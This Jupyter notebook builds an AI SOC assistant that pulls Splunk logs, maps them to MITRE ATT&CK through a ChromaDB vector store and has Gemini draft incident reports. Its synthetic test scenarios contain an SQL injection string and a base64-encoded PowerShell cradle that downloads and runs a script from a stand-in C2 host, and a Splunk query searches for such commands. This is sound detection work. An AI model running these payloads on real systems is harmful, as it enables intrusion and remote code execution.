In [None]:
import os
import splunklib.client as client
import splunklib.results as results
import chromadb
import google.generativeai as genai
from stix2 import MemoryStore, Filter, AttackPattern # Import STIX2 components
from dotenv import load_dotenv
load_dotenv("app.env")
# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "localhost")
SPLUNK_PORT = os.environ.get("SPLUNK_PORT", 8000)
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme")
GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")

if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set.")
genai.configure(api_key=GEMINI_API_KEY)

# ChromaDB setup
CHROMA_DB_PATH = "./chroma_db" # Path for persistent storage
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

In [16]:
import os
import splunklib.client as client
import splunklib.results as results
import chromadb
import google.generativeai as genai
from stix2 import MemoryStore, Filter, AttackPattern # Import STIX2 components
from dotenv import load_dotenv
load_dotenv("app.env")
# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "localhost")
SPLUNK_PORT = os.environ.get("SPLUNK_PORT", 8089)
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme")
GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")

# Ensure API key is set
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set.")
genai.configure(api_key=GEMINI_API_KEY)

# ChromaDB setup
CHROMA_DB_PATH = "./chroma_db" # Path for persistent storage
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# --- Helper Functions ---
genai.configure(api_key=GEMINI_API_KEY)
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    print(f"Attempting to connect to Splunk at {SPLUNK_HOST}:{8089}...")
    try:
        service = client.connect(
            host="127.0.0.1",
            port="8089",
            username="admin",
            password="admin123",
            scheme="https", # Use http for the management port 8089 if not configured for https
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """Runs a Splunk search query and returns results."""
    try:
        kwargs = {"earliest_time": earliest_time, "latest_time": latest_time, "output_mode": output_mode}
        job = service.jobs.create(query, **kwargs)
        while not job.is_ready():
            pass
        if job.is_done():
            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel()
            return events
        else:
            print(f"Splunk search job failed: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []

def get_embedding(text):
    """Generates an embedding for a given text using Gemini."""
    try:
        # Option 1: Use the module-level embedding function (recommended for simplicity)
        # Make sure the genai.configure(api_key=GEMINI_API_KEY) has been called globally
        response = genai.embed_content(model='embedding-001', content=text, task_type="RETRIEVAL_DOCUMENT")

        # Option 2: If you prefer to stick to object-oriented (though not strictly necessary here)
        # model = genai.GenerativeModel('embedding-001') # This line is correct for instantiating the model
        # response = model.embed_content(content=text, task_type="RETRIEVAL_DOCUMENT") # This is incorrect for GenerativeModel

        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding: {e}")
        return None

def load_mitre_attack_data(stix_json_path="enterprise-attack.json"):
    """
    Loads MITRE ATT&CK data from a STIX JSON file and prepares it for the vector store.
    Download from: https://attack.mitre.org/resources/attack-data-and-tools/ (look for STIX 2.x)
    """
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)

        attack_data_points = []
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))

        for tech in techniques:
            description = tech.description if hasattr(tech, 'description') else "No description available."
            external_ids = [ext_ref['external_id'] for ext_ref in tech.external_references if 'external_id' in ext_ref and ext_ref.get('source_name') == 'mitre-attack']
            mitre_id = next((id for id in external_ids if id.startswith('T')), None)

            if not mitre_id: # Skip if no clear MITRE ID (e.g., if it's a deprecated object or not a standard technique)
                continue

            tactics_names = []
            # Find associated tactics using relationships
            for relationship in stix_store.query(Filter("source_ref", "=", tech.id), Filter("relationship_type", "=", "uses")):
                # Ensure the target of the relationship is a tactic object
                tactic_obj = stix_store.query(Filter("id", "=", relationship.target_ref))
                if tactic_obj and tactic_obj[0].type == 'tactic':
                    tactics_names.append(tactic_obj[0].name)

            # Construct the text for embedding. Make it rich enough for Gemini to understand.
            full_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {', '.join(tactics_names) if tactics_names else 'N/A'}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )

            attack_data_points.append({
                "id": mitre_id, # Use MITRE ID as the unique ID for easier mapping
                "text": full_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_names,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path # Useful for debugging
                }
            })
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        return attack_data_points

    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at {stix_json_path}")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge."""
    # Fetch existing IDs to avoid re-adding
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result['ids'])
    
    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            # Generate a stable ID if not provided, e.g., for ad-hoc knowledge
            unique_id = f"custom_knowledge_{hash(dp['text'])}"

        if unique_id in existing_ids:
            continue # Skip if already exists

        embedding = get_embedding(dp["text"])
        if embedding:
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Failed to generate embedding for: {dp['text'][:50]}...")

    if docs_to_add:
        security_collection.add(
            documents=docs_to_add,
            embeddings=embeddings_to_add,
            metadatas=metadatas_to_add,
            ids=ids_to_add
        )
        print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
    else:
        print("No new documents to add to the vector store.")


def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    """
    Searches the vector store for relevant documents.
    Args:
        query_text (str): The text to query with.
        n_results (int): Number of results to retrieve.
        filter_metadata (dict): Optional. A dictionary of metadata to filter results (e.g., {"type": "mitre_attack_technique"}).
    Returns:
        dict: Search results including documents, distances, and metadatas.
    """
    query_embedding = get_embedding(query_text)
    if query_embedding:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata # Apply metadata filter here
        )
        return results
    return None

def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    """
    Generates an incident report using Gemini based on Splunk logs, retrieved knowledge, and MITRE mappings.
    """
    model = genai.GenerativeModel('gemini-pro')

    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name')} ({mapping.get('technique_id')})\n"
            if mapping.get('tactics'):
                mitre_details_str += f"  **Tactics:** {', '.join(mapping['tactics'])}\n"
            # It's better to pass the full description to the LLM and let it summarize if needed.
            # But for the report, show a snippet or the full if it's concise.
            mitre_details_str += f"  **Description:** {mapping['description'][:200]}...\n" # Shorten description for display
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score'):.2f}\n"

    prompt = f"""
    You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, relevant security knowledge, and potential MITRE ATT&CK mappings.

    ---
    **Splunk Logs (Raw Data for Context):**
    {splunk_logs}

    ---
    **Relevant Security Knowledge (from Vector Store):**
    {relevant_knowledge if relevant_knowledge else "No specific relevant security knowledge found."}

    ---
    **Potential MITRE ATT&CK Mappings (Most Relevant First):**
    {mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

    ---
    **Incident Summary (if provided):**
    {incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

    ---
    **Instructions for Report Generation:**
    1.  **Incident Title:** Create a clear and descriptive title.
    2.  **Date/Time of Detection:** Extract from logs. Provide a range if multiple times.
    3.  **Affected Systems/Users:** Identify from logs.
    4.  **Description of Incident:** Summarize the events chronologically and explain what happened. **Crucially, integrate and explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques.**
    5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified. Prioritize based on the provided mappings and your understanding of the logs.
    6.  **Impact:** Briefly describe potential impact (e.g., data breach, service disruption, account compromise).
    7.  **Recommended Actions/Remediation:** Based on relevant knowledge (playbooks) and log analysis, suggest immediate and long-term actions.
    8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
    9.  **Analyst Notes:** Any other observations, open questions, or next steps.

    Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
    """

    try:
        response = model.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    """
    Main function to orchestrate the AI SOC analyst assistant workflow.
    Args:
        splunk_query (str): The Splunk search query to run.
        incident_summary (str): Optional summary of the incident for context.
        distance_threshold (float): Max similarity distance to consider a MITRE mapping relevant.
                                    Lower values mean higher similarity. Tune this!
    Returns:
        str: The generated incident report.
    """
    print(f"--- Starting AI SOC Analyst Assistant for query: {splunk_query} ---")

    # 1. Connect to Splunk
    splunk_service = connect_to_splunk()
    if not splunk_service:
        return "Failed to connect to Splunk. Cannot proceed."

    # 2. Retrieve relevant data from Splunk
    print("Retrieving data from Splunk...")
    raw_splunk_events = run_splunk_query(splunk_service, splunk_query, earliest_time="-24h", latest_time="now")

    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")
        return "No relevant Splunk logs found to generate a report."

    # Convert list of dictionaries to a more readable string for the LLM
    formatted_splunk_logs = "\n".join([str(event) for event in raw_splunk_events])

    # 3. Search Vector Store for relevant general security knowledge
    print("Searching vector store for relevant general security knowledge...")
    # Query for general security knowledge (playbooks, past incidents, policies, assets)
    # Exclude mitre_attack_technique type here to avoid redundancy and focus this query
    general_knowledge_query = f"Based on these security logs, what are relevant security playbooks, past incidents, or policies? Logs: {formatted_splunk_logs}"
    general_knowledge_results = search_security_knowledge_base(
        general_knowledge_query,
        n_results=3,
        filter_metadata={"type": {"$ne": "mitre_attack_technique"}} # Exclude MITRE techniques here
    )

    relevant_knowledge_str = ""
    if general_knowledge_results and general_knowledge_results['documents']:
        print("Found relevant general knowledge:")
        for i, doc in enumerate(general_knowledge_results['documents'][0]):
            relevant_knowledge_str += f"* **Source:** {general_knowledge_results['metadatas'][0][i].get('type', 'N/A')} ({general_knowledge_results['metadatas'][0][i].get('incident_type', '')})\n"
            relevant_knowledge_str += f"    **Content:** {doc}\n\n"
    else:
        print("No specific relevant general knowledge found in vector store.")

    # 4. Search Vector Store specifically for MITRE ATT&CK techniques
    print("Searching vector store for potential MITRE ATT&CK mappings...")
    # Formulate a query that describes the *behavior* you want to map
    mitre_mapping_query = f"Analyze the following security events and identify potential MITRE ATT&CK tactics and techniques: {formatted_splunk_logs}"
    mitre_mapping_results = search_security_knowledge_base(
        mitre_mapping_query,
        n_results=10, # Get more results to ensure comprehensive check
        filter_metadata={"type": "mitre_attack_technique"} # Explicitly filter for ATT&CK techniques
    )

    identified_mitre_mappings = []
    if mitre_mapping_results and mitre_mapping_results['documents']:
        print("Found potential MITRE ATT&CK mappings:")
        for i, doc_content in enumerate(mitre_mapping_results['documents'][0]):
            metadata = mitre_mapping_results['metadatas'][0][i]
            distance = mitre_mapping_results['distances'][0][i]
            if distance < distance_threshold: # Apply confidence threshold
                identified_mitre_mappings.append({
                    "technique_name": metadata.get('technique_name'),
                    "technique_id": metadata.get('technique_id'),
                    "tactics": metadata.get('tactics'),
                    "description": doc_content, # Pass the full description for Gemini to reference
                    "distance_score": distance
                })
        # Sort by distance (lower distance means higher similarity/relevance)
        identified_mitre_mappings.sort(key=lambda x: x['distance_score'])
        # Optionally, limit to top N results after sorting and filtering
        identified_mitre_mappings = identified_mitre_mappings[:5] # Limit to top 5 most relevant

        for mapping in identified_mitre_mappings:
            print(f"  - {mapping['technique_id']}: {mapping['technique_name']} (Score: {mapping['distance_score']:.2f})")
    else:
        print("No relevant MITRE ATT&CK techniques found within the threshold.")

    # 5. Generate Incident Report using Gemini
    print("Generating incident report with Gemini...")
    incident_report = generate_incident_report(
        formatted_splunk_logs,
        relevant_knowledge_str,
        identified_mitre_mappings,
        incident_summary
    )

    print("\n--- AI SOC Analyst Assistant Completed ---")
    return incident_report

# --- Main Execution Block ---
if __name__ == "__main__":
    # --- Initial population of vector store with MITRE data ---
    print("--- Checking/Populating Security Knowledge Base with MITRE ATT&CK ---")

    # 1. First, get the total count of documents in the collection
    total_docs_in_db = security_collection.count()

    # 2. Determine if MITRE data needs to be loaded
    needs_mitre_population = False
    
    if total_docs_in_db == 0:
        # If the collection is completely empty, it definitely needs MITRE data
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. MITRE ATT&CK data needs to be populated.")
    else:
        # If the collection is not empty, check specifically for MITRE data
        try:
            # Use .get() with the 'where' clause to retrieve items matching the filter,
            # include=[] to get only IDs for efficiency.
            mitre_techniques_in_db = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])
            if len(mitre_techniques_in_db['ids']) == 0:
                # Other documents exist, but no MITRE techniques
                needs_mitre_population = True
                print("Other documents found, but MITRE ATT&CK data is not present in knowledge base. Populating now...")
            else:
                print(f"MITRE ATT&CK data already present in knowledge base ({len(mitre_techniques_in_db['ids'])} techniques found). Skipping initial population.")
        except Exception as e:
            # Catch potential errors from .get() if the collection state is tricky
            print(f"Warning: Error checking for existing MITRE data with .get(): {e}")
            print("Assuming MITRE data needs population to be safe.")
            needs_mitre_population = True


    # 3. Perform population if needed
    if needs_mitre_population:
        mitre_data_points = load_mitre_attack_data(stix_json_path="enterprise-attack.json")
        if mitre_data_points:
            populate_security_knowledge_base(mitre_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. Mapping might be less effective.")
    
    # --- Add other general security knowledge (if not already added) ---
    # Simplified check for sample data to avoid re-adding if it seems present
    # A more robust solution for persistent knowledge would involve checking specific IDs of sample_security_knowledge
    
    # Check if a known ID from sample_security_knowledge exists
    sample_data_present = False
    try:
        # Try to get one of the sample data points by its ID
        if security_collection.get(ids=["playbook_phishing_response"], include=[])['ids']:
            sample_data_present = True
    except Exception as e:
        # Handle cases where .get() fails (e.g., empty collection after a full reset)
        print(f"Warning: Error checking for sample data: {e}. Will attempt to add.")
        sample_data_present = False # Assume it's not present if checking fails

    if not sample_data_present:
        print("Sample security knowledge not fully present. Populating now...")
        sample_security_knowledge = [
            {"id": "playbook_phishing_response", "text": "Playbook: Phishing Incident Response. Trigger: User reports suspicious email or email gateway alert. Steps: 1. Verify email authenticity (headers, sender reputation). 2. Check for malicious attachments/links (sandbox). 3. If malicious, remove email from all affected inboxes. 4. Reset user password if credentials compromised. 5. Educate user. 6. Block malicious sender/domains at firewall/proxy. 7. Log and document. Severity: Medium to High depending on compromise.", "metadata": {"type": "playbook", "incident_type": "phishing"}},
            {"id": "playbook_malware_containment", "text": "Playbook: Malware Containment and Eradication. Trigger: EDR alert, antivirus detection, or user report of suspicious activity. Steps: 1. Isolate infected host(s) from network immediately. 2. Collect forensic data (memory dump, process list). 3. Run full endpoint scan. 4. Identify persistence mechanisms (registry, scheduled tasks, services). 5. Remove malware and persistence. 6. Restore affected files from clean backup. 7. Update security definitions. Severity: High.", "metadata": {"type": "playbook", "incident_type": "malware"}},
            {"id": "inc_003_unauth_db_access", "text": "Past Incident: Incident ID INC-2024-003. Type: Unauthorized Access - Database. Date: 2024-05-10. Affected: Customer Database (MySQL). Attack Vector: Brute force via SSH followed by database privilege escalation. Description: Numerous failed SSH logins from external IP, then successful login to 'admin' account, followed by `SELECT * FROM users;` queries. Containment: Blocked source IP at firewall, disabled compromised admin account, rotated DB credentials. Impact: Potential exfiltration of customer PII. Lessons Learned: Implement MFA for all admin accounts, stronger password policies. MITRE ATT&CK T1078 (Valid Accounts), T1110 (Brute Force).", "metadata": {"type": "past_incident", "incident_type": "unauthorized_access", "mitre_id": "T1078, T1110"}},
        ]
        populate_security_knowledge_base(sample_security_knowledge)
    else:
        print("Sample security knowledge appears to be present. Skipping population.")


    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run scenarios with improved MITRE mapping ---
    print("\n\n=== Running Scenario 1: Brute Force & Web Attack (with MITRE Mapping) ===")
    splunk_query_example = """
    search index=main (sourcetype=sshd OR sourcetype=access_combined) earliest=-15m | table _time, host, source, _raw
    | append [| makeresults | eval _time="2024-05-24 09:30:00", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2"]
    | append [| makeresults | eval _time="2024-05-24 09:30:05", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2"]
    | append [| makeresults | eval _time="2024-05-24 09:30:10", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:10 webserver-01 sshd[12345]: Failed password for user admin from 192.168.1.10 port 54322 ssh2"]
    | append [| makeresults | eval _time="2024-05-24 09:30:15", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:15 webserver-01 sshd[12345]: Accepted password for user admin from 192.168.1.10 port 54322 ssh2"]
    | append [| makeresults | eval _time="2024-05-24 09:30:20", host="webserver-01", source="/var/log/apache2/access.log", _raw="192.168.1.10 - - [24/May/2024:09:30:20 +0000] \"GET /admin.php?id=1' UNION SELECT 1,2,3-- HTTP/1.1\" 404 200 \"-\" \"Mozilla/5.0\""]
    | sort _time
    """
    report_1 = ai_soc_analyst_assistant(splunk_query_example, incident_summary="Multiple failed SSH login attempts followed by a successful login and an attempted SQL Injection on a web server.")
    print(report_1)

    print("\n\n=== Running Scenario 2: PowerShell Anomaly (with MITRE Mapping) ===")
    splunk_query_powershell = """
    search index=windows sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational EventCode=4104 (Commandline="*powershell.exe -enc*" OR Commandline="*IEX*") earliest=-1h | table _time, host, EventCode, Commandline
    | append [| makeresults | eval _time="2024-05-24 09:40:00", host="endpoint-05", EventCode="4104", Commandline="powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand SQBFAFgAKAAoAE4AZwBvAE0ALgBJAEUAdwAgACgAIgBoAHQAdABwAHMAOgAvAC8AYwAyAC4AZgBhAGsAZQBkAG8AbwBtAGEAaW4ALwBwAGEAYQB5AGwAbwBhAGQALgBwAHMAMAAiACkAKQAKAA=="]
    | sort _time
    """
    report_powershell = ai_soc_analyst_assistant(splunk_query_powershell, incident_summary="Highly suspicious encoded PowerShell command executed on an endpoint.")
    print(report_powershell)

--- Checking/Populating Security Knowledge Base with MITRE ATT&CK ---
MITRE ATT&CK data already present in knowledge base (823 techniques found). Skipping initial population.
Sample security knowledge appears to be present. Skipping population.

Total unique documents in knowledge base: 826


=== Running Scenario 1: Brute Force & Web Attack (with MITRE Mapping) ===
--- Starting AI SOC Analyst Assistant for query: 
    search index=main (sourcetype=sshd OR sourcetype=access_combined) earliest=-15m | table _time, host, source, _raw
    | append [| makeresults | eval _time="2024-05-24 09:30:00", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2"]
    | append [| makeresults | eval _time="2024-05-24 09:30:05", host="webserver-01", source="/var/log/auth.log", _raw="May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 s

In [None]:
import os
import splunklib.client as client
import splunklib.results as results
import chromadb
import google.generativeai as genai
from stix2 import MemoryStore, Filter, AttackPattern
from dotenv import load_dotenv
load_dotenv("app.env")

# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme")
GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
SPLUNK_TOKEN=os.environ.get("SPLUNK_TOKEN")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Please set it before running.")
genai.configure(api_key=GEMINI_API_KEY)

CHROMA_DB_PATH = "./chroma_db"
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# --- Helper Functions (no changes needed here, assuming previous fixes are in place) ---
def connect_to_splunk():
    try:
        service = client.connect(
            host="127.0.0.1",
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="http" # Keep this if your Splunk 8089 is HTTP
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None
def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    try:
        kwargs = {"earliest_time": earliest_time, "latest_time": latest_time, "output_mode": output_mode}
        job = service.jobs.create(query, **kwargs)
        while not job.is_ready():
            pass
        if job.is_done():
            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel()
            return events
        else:
            print(f"Splunk search job failed: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []

def get_embedding(text):
    try:
        response = genai.embed_content(model='embedding-001', content=text, task_type="RETRIEVAL_DOCUMENT")
        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding: {e}")
        return None

def load_mitre_attack_data(stix_json_path="enterprise-attack.json"):
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)
        attack_data_points = []
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))
        for tech in techniques:
            description = tech.description if hasattr(tech, 'description') else "No description available."
            external_ids = [ext_ref['external_id'] for ext_ref in tech.external_references if 'external_id' in ext_ref and ext_ref.get('source_name') == 'mitre-attack']
            mitre_id = next((id for id in external_ids if id.startswith('T')), None)
            if not mitre_id:
                continue
            tactics_names = []
            for relationship in stix_store.query(Filter("source_ref", "=", tech.id), Filter("relationship_type", "=", "uses")):
                tactic_obj = stix_store.query(Filter("id", "=", relationship.target_ref))
                if tactic_obj and tactic_obj[0].type == 'tactic':
                    tactics_names.append(tactic_obj[0].name)
            tactics_str = ', '.join(tactics_names) if tactics_names else 'N/A'
            full_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {tactics_str}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )
            attack_data_points.append({
                "id": mitre_id,
                "text": full_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_str,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        return attack_data_points
    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at {stix_json_path}")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result['ids'])
    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []
    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            unique_id = f"custom_knowledge_{hash(dp['text'])}"
        if unique_id in existing_ids:
            continue
        embedding = get_embedding(dp["text"])
        if embedding:
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Failed to generate embedding for: {dp['text'][:50]}...")
    if docs_to_add:
        security_collection.add(
            documents=docs_to_add,
            embeddings=embeddings_to_add,
            metadatas=metadatas_to_add,
            ids=ids_to_add
        )
        print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
    else:
        print("No new documents to add to the vector store.")

def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    query_embedding = get_embedding(query_text)
    if query_embedding:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata
        )
        return results
    return None

def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    model = genai.GenerativeModel('gemini-pro')
    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name')} ({mapping.get('technique_id')})\n"
            if mapping.get('tactics') and mapping['tactics'] != 'N/A':
                mitre_details_str += f"  **Tactics:** {mapping['tactics']}\n"
            mitre_details_str += f"  **Description:** {mapping['description'][:200]}...\n"
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score'):.2f}\n"

    prompt = f"""
    You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, relevant security knowledge, and potential MITRE ATT&CK mappings.

    ---
    **Splunk Logs (Raw Data for Context):**
    {splunk_logs}

    ---
    **Relevant Security Knowledge (from Vector Store):**
    {relevant_knowledge if relevant_knowledge else "No specific relevant security knowledge found."}

    ---
    **Potential MITRE ATT&CK Mappings (Most Relevant First):**
    {mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

    ---
    **Incident Summary (if provided):**
    {incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

    ---
    **Instructions for Report Generation:**
    1.  **Incident Title:** Create a clear and descriptive title.
    2.  **Date/Time of Detection:** Extract from logs. Provide a range if multiple times.
    3.  **Affected Systems/Users:** Identify from logs.
    4.  **Description of Incident:** Summarize the events chronologically and explain what happened. **Crucially, integrate and explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques.**
    5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified. Prioritize based on the provided mappings and your understanding of the logs.
    6.  **Impact:** Briefly describe potential impact (e.g., data breach, service disruption, account compromise).
    7.  **Recommended Actions/Remediation:** Based on relevant knowledge (playbooks) and log analysis, suggest immediate and long-term actions.
    8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
    9.  **Analyst Notes:** Any other observations, open questions, or next steps.

    Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
    """
    try:
        response = model.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    print(f"--- Starting AI SOC Analyst Assistant for query: {splunk_query} ---")
    
    # Debug print: This will show the exact query string being sent
    print(f"DEBUG: Attempting to run Splunk query (check for exact string):\n```\n{splunk_query}\n```")

    splunk_service = connect_to_splunk()
    if not splunk_service:
        return "Failed to connect to Splunk. Cannot proceed."
    print("Retrieving data from Splunk...")
    
    raw_splunk_events = run_splunk_query(splunk_service, splunk_query, earliest_time="-24h", latest_time="now")
    
    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")
        return "No relevant Splunk logs found to generate a report."
    
    formatted_splunk_logs = "\n".join([str(event) for event in raw_splunk_events])
    
    print("Searching vector store for relevant general security knowledge...")
    general_knowledge_query = f"Based on these security logs, what are relevant security playbooks, past incidents, or policies? Logs: {formatted_splunk_logs}"
    general_knowledge_results = search_security_knowledge_base(
        general_knowledge_query,
        n_results=3,
        filter_metadata={"type": {"$ne": "mitre_attack_technique"}}
    )
    relevant_knowledge_str = ""
    if general_knowledge_results and general_knowledge_results['documents']:
        print("Found relevant general knowledge:")
        for i, doc in enumerate(general_knowledge_results['documents'][0]):
